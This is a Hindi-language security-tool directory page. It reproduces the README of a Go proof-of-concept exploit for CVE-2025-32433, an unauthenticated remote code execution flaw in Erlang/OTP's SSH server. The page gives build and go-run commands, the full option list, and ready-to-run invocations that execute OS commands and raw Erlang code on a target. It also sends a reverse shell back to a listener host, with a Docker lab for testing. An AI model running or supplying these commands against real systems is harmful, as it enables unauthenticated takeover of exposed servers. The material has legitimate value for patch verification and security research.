Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-32433 — CVE-2025-32433 के लिए Go PoC — Erlang/OTP SSH में अप्रमाणित RCE। | Kitploit
उपकरण/GitHubGitHub/joshuavanderpoll/cve-2025-32433
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubjoshuavanderpoll/cve-2025-32433

cve-2025-32433

CVE-2025-32433 के लिए Go PoC — Erlang/OTP SSH में अप्रमाणित RCE।

रिपॉजिटरी देखें
226 महीने पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Erlang/OTP SSH बिना प्रमाणीकरण वाली ब्लाइंड RCE (CVE-2025-32433) PoC

Go

📜 विवरण

CVE-2025-32433 Erlang/OTP के SSH सर्वर में एक गंभीर बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन कमजोरी है। पैच किए गए संस्करणों से पहले, SSH डेमॉन प्रमाणीकरण पूरा होने से पहले ही चैनल संदेशों को गलत तरीके से संसाधित करता है, जिससे हमलावर बिना क्रेडेंशियल दिए एक चैनल खोल सकता है और exec अनुरोध भेज सकता है। Erlang/OTP के SSH सर्वर का उपयोग करने वाला कोई भी एप्लिकेशन (Elixir, RabbitMQ, CouchDB और अन्य सहित) प्रभावित होता है जब SSH पोर्ट खुला होता है।

यह Go PoC लक्ष्य SSH पोर्ट से जुड़ता है, प्रमाणीकरण से पहले ही एक निर्मित SSH_MSG_CHANNEL_OPEN और फिर SSH_MSG_CHANNEL_REQUEST exec पेलोड भेजता है, जिससे रिमोट Erlang नोड मनमाना OS कमांड निष्पादित करता है। निष्पादन ब्लाइंड है: कोई कमांड आउटपुट हमलावर को वापस नहीं आता।

प्रभावित संस्करण: Erlang/OTP < 27.3.3, < 26.2.5.11, < 25.3.2.20

✨ विशेषताएँ

  • कमजोरी की जाँच — शोषण से पहले यह पुष्टि करने के लिए लक्ष्य की जाँच करें कि यह संवेदनशील है या नहीं
  • कमांड निष्पादन — bash -c के माध्यम से OS कमांड चलाएँ, Erlang के os:cmd में स्वचालित रूप से लपेटा जाता है
  • रॉ Erlang निष्पादन — बिना शेल रैपर के सीधे कोई भी Erlang अभिव्यक्ति भेजें
  • रिवर्स शेल — bash या /dev/tcp पर निर्भर हुए बिना एक मूल gen_tcp रिवर्स शेल तैनात करें
  • IPv6 समर्थन — IPv4 और IPv6 दोनों लक्ष्यों के साथ काम करता है
  • कोई निर्भरता नहीं — एकल बाइनरी, केवल Go मानक पुस्तकालय

🛠️ स्थापना

macOS, Linux, और Windows के लिए पूर्व-निर्मित बाइनरी Releases पृष्ठ पर उपलब्ध हैं। अपने प्लेटफ़ॉर्म के लिए बाइनरी डाउनलोड करें और सीधे चलाएँ — Go स्थापित करने की आवश्यकता नहीं है।

या स्रोत से निर्माण करें:

[!नोट] Go 1.21+ आवश्यक है। कोई बाहरी निर्भरता नहीं — केवल Go मानक पुस्तकालय का उपयोग करता है।

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-32433.git
cd CVE-2025-32433
go build -o cve-2025-32433 cve-2025-32433.go

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-32433.git
cd CVE-2025-32433
go build -o cve-2025-32433.exe cve-2025-32433.go

Go के साथ सीधे स्थापित करें

root@kitploit:~
go install github.com/joshuavanderpoll/cve-2025-32433@latest

स्थापना के बिना चलाएँ

root@kitploit:~
go run github.com/joshuavanderpoll/cve-2025-32433@latest -host 192.168.1.100 -port 22

⚙️ उपयोग

root@kitploit:~
Usage of ./cve-2025-32433:
  -host string
        Target IP or hostname
  -port int
        SSH port (default: 22) (default 22)
  -timeout int
        Connection timeout in seconds (default: 5) (default 5)
  -command string
        Shell command to run on the target (wrapped in os:cmd)
  -code string
        Raw Erlang expression to execute on the target
  -shell
        Send an Erlang-native gen_tcp reverse shell
  -lhost string
        Listener IP for reverse shell (required with -shell)
  -lport int
        Listener port for reverse shell (default: 4444)

जाँचें कि क्या लक्ष्य कमजोर है

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222

कमजोरी जाँच उदाहरण

कमांड निष्पादन

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222 -command 'whoami > /tmp/out2.txt'

कमांड निष्पादन उदाहरण

रिवर्स शेल

-shell फ़्लैग एक मूल Erlang gen_tcp रिवर्स शेल पेलोड भेजता है — किसी bash या /dev/tcp की आवश्यकता नहीं। पहले एक सुनने वाला शुरू करें, फिर शोषण भेजें।

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222 -shell -lhost host.docker.internal -lport 4444 

कोड निष्पादन उदाहरण

कोड निष्पादन

-code फ़्लैग बिना bash -c रैपर के सीधे एक रॉ Erlang अभिव्यक्ति भेजता है। शुद्ध Erlang ऑप्स के लिए या जब लक्ष्य पर bash उपलब्ध न हो, उपयोगी। चूँकि निष्पादन ब्लाइंड है, आउटपुट को एक फ़ाइल में लिखें और अलग से पुनः प्राप्त करें।

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222 -code 'file:write_file("/tmp/out.txt", os:cmd("id")).'

कोड निष्पादन उदाहरण

🐋 Docker PoC

अधिक विवरण docker/DOCKER.md पर

root@kitploit:~
cd docker/
docker compose down
docker compose up -d
# You can test at -host 127.0.0.1 -port 2222

🕵🏼 संदर्भ

  • Erlang/OTP सुरक्षा सलाहकार
  • NVD — CVE-2025-32433
  • HackIndex

📢 अस्वीकरण

यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। निर्माता उपकरण द्वारा होने वाले किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें